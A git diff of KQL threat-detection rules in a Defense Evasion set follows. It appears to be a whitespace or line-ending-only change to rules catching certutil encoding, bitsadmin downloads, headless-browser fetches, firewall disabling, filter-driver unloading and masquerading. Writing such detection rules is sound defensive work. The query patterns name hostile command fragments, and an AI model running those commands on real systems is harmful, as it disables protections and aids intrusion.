diff --git a/KQL/rules/Defense Evasion/file_download_with_headless_browser.kql b/KQL/rules/Defense Evasion/file_download_with_headless_browser.kql
index 4b5e1ef3..fc899b61 100644
--- a/KQL/rules/Defense Evasion/file_download_with_headless_browser.kql
+++ b/KQL/rules/Defense Evasion/file_download_with_headless_browser.kql
@@ -1,10 +1,10 @@
-// Title: File Download with Headless Browser
-// Author: Sreeman, Florian Roth (Nextron Systems)
-// Date: 2022-01-04
-// Level: high
-// Description: Detects execution of chromium based browser in headless mode using the "dump-dom" command line to download files
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.command-and-control, attack.t1105, attack.t1564.003
-
-DeviceProcessEvents
+// Title: File Download with Headless Browser
+// Author: Sreeman, Florian Roth (Nextron Systems)
+// Date: 2022-01-04
+// Level: high
+// Description: Detects execution of chromium based browser in headless mode using the "dump-dom" command line to download files
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.command-and-control, attack.t1105, attack.t1564.003
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "--headless" and ProcessCommandLine contains "dump-dom" and ProcessCommandLine contains "http") and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\vivaldi.exe")) and (not(((ProcessCommandLine contains "--headless --disable-gpu --disable-extensions --disable-plugins --mute-audio --no-first-run --incognito --aggressive-cache-discard --dump-dom" and (FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\msedgewebview2.exe" or FolderPath endswith "\\MicrosoftEdge.exe") and (FolderPath startswith "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\" or FolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeCore\\" or FolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\" or FolderPath startswith "C:\\Program Files\\Microsoft\\Edge\\Application\\" or FolderPath startswith "C:\\Program Files\\Microsoft\\EdgeCore\\" or FolderPath startswith "C:\\Program Files\\Microsoft\\EdgeWebView\\" or FolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft.MicrosoftEdge")) or (ProcessCommandLine contains "--headless --disable-gpu --disable-extensions --disable-plugins --mute-audio --no-first-run --incognito --aggressive-cache-discard --dump-dom" and (FolderPath contains "\\AppData\\Local\\Microsoft\\WindowsApps\\" or FolderPath contains "\\Windows\\SystemApps\\Microsoft.MicrosoftEdge") and (FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\MicrosoftEdge.exe")))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/file_encoded_to_base64_via_certutil_exe.kql b/KQL/rules/Defense Evasion/file_encoded_to_base64_via_certutil_exe.kql
index 6671829f..a082c43e 100644
--- a/KQL/rules/Defense Evasion/file_encoded_to_base64_via_certutil_exe.kql
+++ b/KQL/rules/Defense Evasion/file_encoded_to_base64_via_certutil_exe.kql
@@ -1,12 +1,12 @@
-// Title: File Encoded To Base64 Via Certutil.EXE
-// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019-02-24
-// Level: medium
-// Description: Detects the execution of certutil with the "encode" flag to encode a file to base64. This can be abused by threat actors and attackers for data exfiltration
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1027
-// False Positives:
-// - As this is a general purpose rule, legitimate usage of the encode functionality will trigger some false positives. Apply additional filters accordingly
-
-DeviceProcessEvents
+// Title: File Encoded To Base64 Via Certutil.EXE
+// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-02-24
+// Level: medium
+// Description: Detects the execution of certutil with the "encode" flag to encode a file to base64. This can be abused by threat actors and attackers for data exfiltration
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027
+// False Positives:
+// - As this is a general purpose rule, legitimate usage of the encode functionality will trigger some false positives. Apply additional filters accordingly
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "-encode" or ProcessCommandLine contains "/encode" or ProcessCommandLine contains "–encode" or ProcessCommandLine contains "—encode" or ProcessCommandLine contains "―encode") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/file_in_suspicious_location_encoded_to_base64_via_certutil_exe.kql b/KQL/rules/Defense Evasion/file_in_suspicious_location_encoded_to_base64_via_certutil_exe.kql
index 5b328441..11db1924 100644
--- a/KQL/rules/Defense Evasion/file_in_suspicious_location_encoded_to_base64_via_certutil_exe.kql
+++ b/KQL/rules/Defense Evasion/file_in_suspicious_location_encoded_to_base64_via_certutil_exe.kql
@@ -1,10 +1,10 @@
-// Title: File In Suspicious Location Encoded To Base64 Via Certutil.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-05-15
-// Level: high
-// Description: Detects the execution of certutil with the "encode" flag to encode a file to base64 where the files are located in potentially suspicious locations
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1027
-
-DeviceProcessEvents
+// Title: File In Suspicious Location Encoded To Base64 Via Certutil.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-15
+// Level: high
+// Description: Detects the execution of certutil with the "encode" flag to encode a file to base64 where the files are located in potentially suspicious locations
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "-encode" or ProcessCommandLine contains "/encode" or ProcessCommandLine contains "–encode" or ProcessCommandLine contains "—encode" or ProcessCommandLine contains "―encode") and (ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Local\\Temp\\" or ProcessCommandLine contains "\\PerfLogs\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\Windows\\Temp\\" or ProcessCommandLine contains "$Recycle.Bin") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/file_time_attribute_change.kql b/KQL/rules/Defense Evasion/file_time_attribute_change.kql
index 82cf7ee8..e51178de 100644
--- a/KQL/rules/Defense Evasion/file_time_attribute_change.kql
+++ b/KQL/rules/Defense Evasion/file_time_attribute_change.kql
@@ -1,10 +1,10 @@
-// Title: File Time Attribute Change
-// Author: Igor Fits, Mikhail Larin, oscd.community
-// Date: 2020-10-19
-// Level: medium
-// Description: Detect file time attribute change to hide new or changes to existing files
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1070.006
-
-DeviceProcessEvents
+// Title: File Time Attribute Change
+// Author: Igor Fits, Mikhail Larin, oscd.community
+// Date: 2020-10-19
+// Level: medium
+// Description: Detect file time attribute change to hide new or changes to existing files
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.006
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "-t" or ProcessCommandLine contains "-acmr" or ProcessCommandLine contains "-d" or ProcessCommandLine contains "-r") and FolderPath endswith "/touch"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/file_with_suspicious_extension_downloaded_via_bitsadmin.kql b/KQL/rules/Defense Evasion/file_with_suspicious_extension_downloaded_via_bitsadmin.kql
index 33c61809..4ffd38e6 100644
--- a/KQL/rules/Defense Evasion/file_with_suspicious_extension_downloaded_via_bitsadmin.kql
+++ b/KQL/rules/Defense Evasion/file_with_suspicious_extension_downloaded_via_bitsadmin.kql
@@ -1,10 +1,10 @@
-// Title: File With Suspicious Extension Downloaded Via Bitsadmin
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-06-28
-// Level: high
-// Description: Detects usage of bitsadmin downloading a file with a suspicious extension
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003
-
-DeviceProcessEvents
+// Title: File With Suspicious Extension Downloaded Via Bitsadmin
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-28
+// Level: high
+// Description: Detects usage of bitsadmin downloading a file with a suspicious extension
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains ".7z" or ProcessCommandLine contains ".asax" or ProcessCommandLine contains ".ashx" or ProcessCommandLine contains ".asmx" or ProcessCommandLine contains ".asp" or ProcessCommandLine contains ".aspx" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".cfm" or ProcessCommandLine contains ".cgi" or ProcessCommandLine contains ".chm" or ProcessCommandLine contains ".cmd" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".gif" or ProcessCommandLine contains ".jpeg" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".jsp" or ProcessCommandLine contains ".jspx" or ProcessCommandLine contains ".log" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".ps1" or ProcessCommandLine contains ".psm1" or ProcessCommandLine contains ".rar" or ProcessCommandLine contains ".scf" or ProcessCommandLine contains ".sct" or ProcessCommandLine contains ".txt" or ProcessCommandLine contains ".vbe" or ProcessCommandLine contains ".vbs" or ProcessCommandLine contains ".war" or ProcessCommandLine contains ".wsf" or ProcessCommandLine contains ".wsh" or ProcessCommandLine contains ".xll" or ProcessCommandLine contains ".zip") and (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/files_with_system_dll_name_in_unsuspected_locations.kql b/KQL/rules/Defense Evasion/files_with_system_dll_name_in_unsuspected_locations.kql
index bf3cc154..cc19cbbc 100644
--- a/KQL/rules/Defense Evasion/files_with_system_dll_name_in_unsuspected_locations.kql
+++ b/KQL/rules/Defense Evasion/files_with_system_dll_name_in_unsuspected_locations.kql
@@ -1,13 +1,13 @@
-// Title: Files With System DLL Name In Unsuspected Locations
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024-06-24
-// Level: medium
-// Description: Detects the creation of a file with the ".dll" extension that has the name of a System DLL in uncommon or unsuspected locations. (Outisde of "System32", "SysWOW64", etc.).
-// It is highly recommended to perform an initial baseline before using this rule in production.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1036.005
-// False Positives:
-// - Third party software might bundle specific versions of system DLLs.
-
-DeviceFileEvents
+// Title: Files With System DLL Name In Unsuspected Locations
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-06-24
+// Level: medium
+// Description: Detects the creation of a file with the ".dll" extension that has the name of a System DLL in uncommon or unsuspected locations. (Outisde of "System32", "SysWOW64", etc.).
+// It is highly recommended to perform an initial baseline before using this rule in production.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.005
+// False Positives:
+// - Third party software might bundle specific versions of system DLLs.
+
+DeviceFileEvents
 | where (FolderPath endswith "\\secur32.dll" or FolderPath endswith "\\tdh.dll") and (not((FolderPath contains "C:\\$WINDOWS.~BT\\" or FolderPath contains "C:\\$WinREAgent\\" or FolderPath contains "C:\\Windows\\SoftwareDistribution\\" or FolderPath contains "C:\\Windows\\System32\\" or FolderPath contains "C:\\Windows\\SysWOW64\\" or FolderPath contains "C:\\Windows\\WinSxS\\" or FolderPath contains "C:\\Windows\\uus\\")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/files_with_system_process_name_in_unsuspected_locations.kql b/KQL/rules/Defense Evasion/files_with_system_process_name_in_unsuspected_locations.kql
index 19db18b1..90c132a2 100644
--- a/KQL/rules/Defense Evasion/files_with_system_process_name_in_unsuspected_locations.kql
+++ b/KQL/rules/Defense Evasion/files_with_system_process_name_in_unsuspected_locations.kql
@@ -1,14 +1,14 @@ -// Title: Files With System Process Name In Unsuspected Locations -// Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) -// Date: 2020-05-26 -// Level: medium -// Description: Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64, etc.). -// It is highly recommended to perform an initial baseline before using this rule in production. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036.005 -// False Positives: -// - System processes copied outside their default folders for testing purposes -// - Third party software naming their software with the same names as the processes mentioned here - -DeviceFileEvents +// Title: Files With System Process Name In Unsuspected Locations +// Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) +// Date: 2020-05-26 +// Level: medium +// Description: Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64, etc.). +// It is highly recommended to perform an initial baseline before using this rule in production. 
+// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036.005 +// False Positives: +// - System processes copied outside their default folders for testing purposes +// - Third party software naming their software with the same names as the processes mentioned here + +DeviceFileEvents | where (FolderPath endswith "\\AtBroker.exe" or FolderPath endswith "\\audiodg.exe" or FolderPath endswith "\\backgroundTaskHost.exe" or FolderPath endswith "\\bcdedit.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\cmdl32.exe" or FolderPath endswith "\\cmstp.exe" or FolderPath endswith "\\conhost.exe" or FolderPath endswith "\\csrss.exe" or FolderPath endswith "\\dasHost.exe" or FolderPath endswith "\\dfrgui.exe" or FolderPath endswith "\\dllhost.exe" or FolderPath endswith "\\dwm.exe" or FolderPath endswith "\\eventcreate.exe" or FolderPath endswith "\\eventvwr.exe" or FolderPath endswith "\\explorer.exe" or FolderPath endswith "\\extrac32.exe" or FolderPath endswith "\\fontdrvhost.exe" or FolderPath endswith "\\ipconfig.exe" or FolderPath endswith "\\iscsicli.exe" or FolderPath endswith "\\iscsicpl.exe" or FolderPath endswith "\\logman.exe" or FolderPath endswith "\\LogonUI.exe" or FolderPath endswith "\\LsaIso.exe" or FolderPath endswith "\\lsass.exe" or FolderPath endswith "\\lsm.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\msinfo32.exe" or FolderPath endswith "\\mstsc.exe" or FolderPath endswith "\\nbtstat.exe" or FolderPath endswith "\\odbcconf.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regini.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\RuntimeBroker.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\SearchFilterHost.exe" or FolderPath endswith "\\SearchIndexer.exe" or FolderPath endswith "\\SearchProtocolHost.exe" or FolderPath endswith 
"\\SecurityHealthService.exe" or FolderPath endswith "\\SecurityHealthSystray.exe" or FolderPath endswith "\\services.exe" or FolderPath endswith "\\ShellAppRuntime.exe" or FolderPath endswith "\\sihost.exe" or FolderPath endswith "\\smartscreen.exe" or FolderPath endswith "\\smss.exe" or FolderPath endswith "\\spoolsv.exe" or FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\SystemSettingsBroker.exe" or FolderPath endswith "\\taskhost.exe" or FolderPath endswith "\\taskhostw.exe" or FolderPath endswith "\\Taskmgr.exe" or FolderPath endswith "\\TiWorker.exe" or FolderPath endswith "\\vssadmin.exe" or FolderPath endswith "\\w32tm.exe" or FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\WerFaultSecure.exe" or FolderPath endswith "\\wermgr.exe" or FolderPath endswith "\\wevtutil.exe" or FolderPath endswith "\\wininit.exe" or FolderPath endswith "\\winlogon.exe" or FolderPath endswith "\\winrshost.exe" or FolderPath endswith "\\WinRTNetMUAHostServer.exe" or FolderPath endswith "\\wlanext.exe" or FolderPath endswith "\\wlrmdr.exe" or FolderPath endswith "\\WmiPrvSE.exe" or FolderPath endswith "\\wslhost.exe" or FolderPath endswith "\\WSReset.exe" or FolderPath endswith "\\WUDFHost.exe" or FolderPath endswith "\\WWAHost.exe") and (not((FolderPath endswith "C:\\Windows\\explorer.exe" or (FolderPath contains "C:\\$WINDOWS.~BT\\" or FolderPath contains "C:\\$WinREAgent\\" or FolderPath contains "C:\\Windows\\SoftwareDistribution\\" or FolderPath contains "C:\\Windows\\System32\\" or FolderPath contains "C:\\Windows\\SysWOW64\\" or FolderPath contains "C:\\Windows\\WinSxS\\" or FolderPath contains "C:\\Windows\\uus\\") or (InitiatingProcessFolderPath endswith "\\SecurityHealthSetup.exe" and FolderPath contains "C:\\Windows\\System32\\SecurityHealth\\" and FolderPath endswith "\\SecurityHealthSystray.exe") or ((InitiatingProcessFolderPath endswith "C:\\WINDOWS\\system32\\msiexec.exe" or InitiatingProcessFolderPath endswith 
"C:\\WINDOWS\\SysWOW64\\msiexec.exe") and (FolderPath startswith "C:\\Program Files\\PowerShell\\7\\pwsh.exe" or FolderPath startswith "C:\\Program Files\\PowerShell\\7-preview\\pwsh.exe" or FolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft.PowerShellPreview\\")) or ((InitiatingProcessFolderPath endswith "C:\\Windows\\system32\\svchost.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\SysWOW64\\svchost.exe") and (FolderPath contains "C:\\Program Files\\WindowsApps\\" or FolderPath contains "C:\\Program Files (x86)\\WindowsApps\\" or FolderPath contains "\\AppData\\Local\\Microsoft\\WindowsApps\\")) or (InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\wuauclt.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\SysWOW64\\wuauclt.exe")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/filter_driver_unloaded_via_fltmc_exe.kql b/KQL/rules/Defense Evasion/filter_driver_unloaded_via_fltmc_exe.kql index 21ae1916..2af0dd67 100644 --- a/KQL/rules/Defense Evasion/filter_driver_unloaded_via_fltmc_exe.kql +++ b/KQL/rules/Defense Evasion/filter_driver_unloaded_via_fltmc_exe.kql 
@@ -1,10 +1,10 @@ -// Title: Filter Driver Unloaded Via Fltmc.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-02-13 -// Level: medium -// Description: Detect filter driver unloading activity via fltmc.exe -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1070, attack.t1562, attack.t1562.002 - -DeviceProcessEvents +// Title: Filter Driver Unloaded Via Fltmc.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-13 +// Level: medium +// Description: Detect filter driver unloading activity via fltmc.exe +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070, attack.t1562, attack.t1562.002 + +DeviceProcessEvents | where (ProcessCommandLine contains "unload" and (FolderPath endswith "\\fltMC.exe" or ProcessVersionInfoOriginalFileName =~ "fltMC.exe")) and (not((((ProcessCommandLine endswith "unload rtp_filesystem_filter" or ProcessCommandLine endswith "unload rtp_filter") and (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" or InitiatingProcessFolderPath contains ":\\Windows\\Temp\\") and InitiatingProcessFolderPath endswith "\\endpoint-protection-installer-x64.tmp") or (ProcessCommandLine endswith "unload DFMFilter" and InitiatingProcessFolderPath =~ "C:\\Program Files (x86)\\ManageEngine\\uems_agent\\bin\\dcfaservice64.exe")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/findstr_launching_lnk_file.kql b/KQL/rules/Defense Evasion/findstr_launching_lnk_file.kql index efa1b78c..193ef27c 100644 --- a/KQL/rules/Defense Evasion/findstr_launching_lnk_file.kql +++ b/KQL/rules/Defense Evasion/findstr_launching_lnk_file.kql 
@@ -1,10 +1,10 @@ -// Title: Findstr Launching .lnk File -// Author: Trent Liffick -// Date: 2020-05-01 -// Level: medium -// Description: Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036, attack.t1202, attack.t1027.003 - -DeviceProcessEvents +// Title: Findstr Launching .lnk File +// Author: Trent Liffick +// Date: 2020-05-01 +// Level: medium +// Description: Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036, attack.t1202, attack.t1027.003 + +DeviceProcessEvents | where (ProcessCommandLine endswith ".lnk" or ProcessCommandLine endswith ".lnk\"" or ProcessCommandLine endswith ".lnk'") and ((FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe") or (ProcessVersionInfoOriginalFileName in~ ("FIND.EXE", "FINDSTR.EXE"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/firewall_disabled_via_netsh_exe.kql b/KQL/rules/Defense Evasion/firewall_disabled_via_netsh_exe.kql index d8be9c5c..926ed3d7 100644 --- a/KQL/rules/Defense Evasion/firewall_disabled_via_netsh_exe.kql +++ b/KQL/rules/Defense Evasion/firewall_disabled_via_netsh_exe.kql 
@@ -1,12 +1,12 @@ -// Title: Firewall Disabled via Netsh.EXE -// Author: Fatih Sirin -// Date: 2019-11-01 -// Level: medium -// Description: Detects netsh commands that turns off the Windows firewall -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.004, attack.s0108 -// False Positives: -// - Legitimate administration activity - -DeviceProcessEvents +// Title: Firewall Disabled via Netsh.EXE +// Author: Fatih Sirin +// Date: 2019-11-01 +// Level: medium +// Description: Detects netsh commands that turns off the Windows firewall +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.004, attack.s0108 +// False Positives: +// - Legitimate administration activity + +DeviceProcessEvents | where (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") and ((ProcessCommandLine contains "firewall" and ProcessCommandLine contains "set" and ProcessCommandLine contains "opmode" and ProcessCommandLine contains "disable") or (ProcessCommandLine contains "advfirewall" and ProcessCommandLine contains "set" and ProcessCommandLine contains "state" and ProcessCommandLine contains "off")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/firewall_rule_deleted_via_netsh_exe.kql b/KQL/rules/Defense Evasion/firewall_rule_deleted_via_netsh_exe.kql index 50e6d47e..7eff5b8e 100644 --- a/KQL/rules/Defense Evasion/firewall_rule_deleted_via_netsh_exe.kql +++ b/KQL/rules/Defense Evasion/firewall_rule_deleted_via_netsh_exe.kql 
@@ -1,13 +1,13 @@ -// Title: Firewall Rule Deleted Via Netsh.EXE -// Author: frack113 -// Date: 2022-08-14 -// Level: medium -// Description: Detects the removal of a port or application rule in the Windows Firewall configuration using netsh -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.004 -// False Positives: -// - Legitimate administration activity -// - Software installations and removal - -DeviceProcessEvents +// Title: Firewall Rule Deleted Via Netsh.EXE +// Author: frack113 +// Date: 2022-08-14 +// Level: medium +// Description: Detects the removal of a port or application rule in the Windows Firewall configuration using netsh +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.004 +// False Positives: +// - Legitimate administration activity +// - Software installations and removal + +DeviceProcessEvents | where ((ProcessCommandLine contains "firewall" and ProcessCommandLine contains "delete ") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")) and (not(((ProcessCommandLine contains "advfirewall firewall delete rule name=\"Avast Antivirus Admin Client\"" and InitiatingProcessFolderPath endswith "\\instup.exe") or (ProcessCommandLine contains "name=Dropbox" and InitiatingProcessFolderPath endswith "\\Dropbox.exe")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/firewall_rule_update_via_netsh_exe.kql b/KQL/rules/Defense Evasion/firewall_rule_update_via_netsh_exe.kql index 2cf9e702..36d47e3b 100644 --- a/KQL/rules/Defense Evasion/firewall_rule_update_via_netsh_exe.kql +++ b/KQL/rules/Defense Evasion/firewall_rule_update_via_netsh_exe.kql 
@@ -1,13 +1,13 @@ -// Title: Firewall Rule Update Via Netsh.EXE -// Author: X__Junior (Nextron Systems) -// Date: 2023-07-18 -// Level: medium -// Description: Detects execution of netsh with the "advfirewall" and the "set" option in order to set new values for properties of a existing rule -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion -// False Positives: -// - Legitimate administration activity -// - Software installations and removal - -DeviceProcessEvents +// Title: Firewall Rule Update Via Netsh.EXE +// Author: X__Junior (Nextron Systems) +// Date: 2023-07-18 +// Level: medium +// Description: Detects execution of netsh with the "advfirewall" and the "set" option in order to set new values for properties of a existing rule +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion +// False Positives: +// - Legitimate administration activity +// - Software installations and removal + +DeviceProcessEvents | where (ProcessCommandLine contains " firewall " and ProcessCommandLine contains " set ") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/flush_iptables_ufw_chain.kql b/KQL/rules/Defense Evasion/flush_iptables_ufw_chain.kql index 1a816e52..10a4fa07 100644 --- a/KQL/rules/Defense Evasion/flush_iptables_ufw_chain.kql +++ b/KQL/rules/Defense Evasion/flush_iptables_ufw_chain.kql 
@@ -1,12 +1,12 @@ -// Title: Flush Iptables Ufw Chain -// Author: Joseliyo Sanchez, @Joseliyo_Jstnk -// Date: 2023-01-18 -// Level: medium -// Description: Detect use of iptables to flush all firewall rules, tables and chains and allow all network traffic -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.004 -// False Positives: -// - Network administrators - -DeviceProcessEvents +// Title: Flush Iptables Ufw Chain +// Author: Joseliyo Sanchez, @Joseliyo_Jstnk +// Date: 2023-01-18 +// Level: medium +// Description: Detect use of iptables to flush all firewall rules, tables and chains and allow all network traffic +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.004 +// False Positives: +// - Network administrators + +DeviceProcessEvents | where (FolderPath endswith "/iptables" or FolderPath endswith "/xtables-legacy-multi" or FolderPath endswith "/iptables-legacy-multi" or FolderPath endswith "/ip6tables" or FolderPath endswith "/ip6tables-legacy-multi") and (ProcessCommandLine contains "-F" or ProcessCommandLine contains "-Z" or ProcessCommandLine contains "-X") and (ProcessCommandLine contains "ufw-logging-deny" or ProcessCommandLine contains "ufw-logging-allow" or ProcessCommandLine contains "ufw6-logging-deny" or ProcessCommandLine contains "ufw6-logging-allow") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/folder_removed_from_exploit_guard_protectedfolders_list_registry.kql b/KQL/rules/Defense Evasion/folder_removed_from_exploit_guard_protectedfolders_list_registry.kql index 0d178633..bc92427d 100644 --- a/KQL/rules/Defense Evasion/folder_removed_from_exploit_guard_protectedfolders_list_registry.kql +++ b/KQL/rules/Defense Evasion/folder_removed_from_exploit_guard_protectedfolders_list_registry.kql 
@@ -1,12 +1,12 @@ -// Title: Folder Removed From Exploit Guard ProtectedFolders List - Registry -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-05 -// Level: high -// Description: Detects the removal of folders from the "ProtectedFolders" list of of exploit guard. This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 -// False Positives: -// - Legitimate administrators removing applications (should always be investigated) - -DeviceRegistryEvents +// Title: Folder Removed From Exploit Guard ProtectedFolders List - Registry +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-05 +// Level: high +// Description: Detects the removal of folders from the "ProtectedFolders" list of of exploit guard. This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Legitimate administrators removing applications (should always be investigated) + +DeviceRegistryEvents | where ActionType =~ "DeleteValue" and RegistryKey contains "SOFTWARE\\Microsoft\\Windows Defender\\Windows Defender Exploit Guard\\Controlled Folder Access\\ProtectedFolders" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/forfiles_exe_child_process_masquerading.kql b/KQL/rules/Defense Evasion/forfiles_exe_child_process_masquerading.kql index a50dfd4c..4d64af1a 100644 --- a/KQL/rules/Defense Evasion/forfiles_exe_child_process_masquerading.kql +++ b/KQL/rules/Defense Evasion/forfiles_exe_child_process_masquerading.kql 
@@ -1,10 +1,10 @@ -// Title: Forfiles.EXE Child Process Masquerading -// Author: Nasreddine Bencherchali (Nextron Systems), Anish Bogati -// Date: 2024-01-05 -// Level: high -// Description: Detects the execution of "forfiles" from a non-default location, in order to potentially spawn a custom "cmd.exe" from the current working directory. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036 - -DeviceProcessEvents +// Title: Forfiles.EXE Child Process Masquerading +// Author: Nasreddine Bencherchali (Nextron Systems), Anish Bogati +// Date: 2024-01-05 +// Level: high +// Description: Detects the execution of "forfiles" from a non-default location, in order to potentially spawn a custom "cmd.exe" from the current working directory. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036 + +DeviceProcessEvents | where (ProcessCommandLine startswith "/c echo \"" and FolderPath endswith "\\cmd.exe" and (InitiatingProcessCommandLine endswith ".exe" or InitiatingProcessCommandLine endswith ".exe\"")) and (not(((FolderPath contains ":\\Windows\\System32\\" or FolderPath contains ":\\Windows\\SysWOW64\\") and FolderPath endswith "\\cmd.exe" and (InitiatingProcessFolderPath contains ":\\Windows\\System32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\") and InitiatingProcessFolderPath endswith "\\forfiles.exe"))) 